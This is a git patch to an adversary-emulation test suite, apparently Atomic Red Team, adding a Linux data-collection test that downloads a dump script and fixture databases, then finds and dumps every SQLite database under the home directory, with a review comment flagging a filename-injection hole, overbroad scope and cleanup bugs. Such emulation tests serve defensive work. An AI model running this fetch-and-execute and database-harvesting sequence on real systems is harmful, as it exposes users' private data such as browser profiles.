From 07225ec592cd574dd2d5e8a198dc43bb316bd786 Mon Sep 17 00:00:00 2001
From: Biological Robot <121760096+biot-2131@users.noreply.github.com>
Date: Thu, 9 Nov 2023 04:05:07 +0000
Subject: [PATCH] T1005 Find and dump sqlite databases (Linux) (#2402)

---
 atomics/T1005/T1005.yaml | 38 +++++++++++++++++++++++++++++--
 atomics/T1005/src/art | Bin 0 -> 8192 bytes
 atomics/T1005/src/gta.db | Bin 0 -> 12288 bytes
 atomics/T1005/src/sqlite_dump.sh | 31 +++++++++++++++++++++++++
 4 files changed, 67 insertions(+), 2 deletions(-)
 create mode 100644 atomics/T1005/src/art
 create mode 100644 atomics/T1005/src/gta.db
 create mode 100644 atomics/T1005/src/sqlite_dump.sh

diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml
index 0f84e893cb..7c29fad1e4 100644
--- a/atomics/T1005/T1005.yaml
+++ b/atomics/T1005/T1005.yaml
@@ -1,5 +1,5 @@
 attack_technique: T1005
-display_name: 'Data from Local System'
+display_name: Data from Local System
 atomic_tests:
 - name: Search files of interest and save them to a single zip file (Windows)
   auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
@@ -52,4 +52,38 @@ atomic_tests:
       Remove-Item -Path $outputZip\data.zip -Force
     name: powershell
-    elevation_required: false
\ No newline at end of file
+    elevation_required: false
+- name: Find and dump sqlite databases (Linux)
+  description: |
+    An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cd $HOME
+      curl -O #{remote_url}/art
+      curl -O #{remote_url}/gta.db
+      curl -O #{remote_url}/sqlite_dump.sh
+      chmod +x sqlite_dump.sh
+      find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
+    cleanup_command: |
+      rm -f $HOME/.art
+      rm -f $HOME/gta.db
+      rm -f $HOME/sqlite_dump.sh
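Review bot: In the new `command:` block, `find . ! -executable -exec bash -c '... {} ...'` splices each discovered filename into the shell string, so any file under `$HOME` whose name contains a quote, `$(…)` or whitespace will break the loop or be executed as code (ShellCheck SC2156); pass the path as an argument instead, e.g. `find . -type f ! -executable -exec bash -c '[[ "$(head -c 15 -- "$1" | strings)" == "SQLite format 3" ]] && { printf "%s\n" "$1"; ./sqlite_dump.sh "$1"; }' _ {} \;` (the added `-type f` also keeps `head` off directories). Because the executor first runs `cd $HOME` with no depth limit, the walk covers the operator's entire home directory rather than just the two downloaded fixtures, and every SQLite database it finds — browser profiles, for instance — is dumped into the executor output; if that is the intended emulation it should be stated in `description`, otherwise add `-maxdepth 1` or run the test from a `mktemp -d` directory. `cleanup_command` removes `$HOME/.art`, but `curl -O #{remote_url}/art` saves the fixture as `$HOME/art`, so it is left behind; it should read `rm -f $HOME/art`. The three `curl -O` calls carry no `-f`, so a 404 leaves an HTML error page named `sqlite_dump.sh` that is then `chmod +x`'d and run; `curl -fsSLO` would fail the step instead. Finally, the dependency text `Check if running on a Debian based machine.` does not describe `prereq_command`, which checks for sqlite3, curl and strings; `/etc/os-release` is the documented path (`/usr/lib/os-release` is only its fallback), and `yum update -y` upgrades the whole system as a side effect of installing three packages.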
diff --git a/atomics/T1005/src/art b/atomics/T1005/src/art new file mode 100644 index 0000000000000000000000000000000000000000..a4d0780c4cbc7e1a029cc4d28128bb96542df8f4 GIT binary patch literal 8192 zcmeI#PfNov6aesKD~JcFc-b{a1sO}*G>u+1Wf$2d>cn%BzRbe9jkcm5J$v#?`MJyn z1DyvyfbWri?~y<7yXEd?R5ZZcvMP1MVsc0*C4I&SA=LMl@7q}C!8Y;pI{zyu={{T? z_+2#oAiiOs01BW03ZMWApa2S>01BW03ZMWAtOZKC*XeZVn`*R~!&41ay%}1Ux5L47 z$fkpf(U5IQ$FHC(RxBErLB%H5Q#QFDjZPVqx|p*DUYc*km9FdOWtIP|pRE7pL3l*M z&+t8*_yq01BW03ZMWApa2S>01EsIfwLf>avYSpnnAyLgt{nK^>R^n?Xt8| zN)S1u+zOL$VR&pJd3Yx~k#O>OmjRmq6N z%74PYf)LPwg_(bWk#nkqkPNI;`ab#BdwMzBpY1ul=Sk|AhPgd4j<&=NA*FaiB!rND zulRi$Wgbiue=hTXg%l57?p*g>DvU+=!5#M(fihuwFAOHafKmY;|fB*y_009X6_X4+cpdQ}TKibx02h=~}p`-ZBh$s@>2Ri*1j~Whl-L`~+VV&iKF3^Wl8$ zZV;&Ey8gQS!$G>wleK3Tw=02aMEc8OFLgSd`G<*=f3G|G^HSfVI2)fIvE@4L_Tqao zQ1`d>r^U9}V|MwR+GlLDg2(0jFT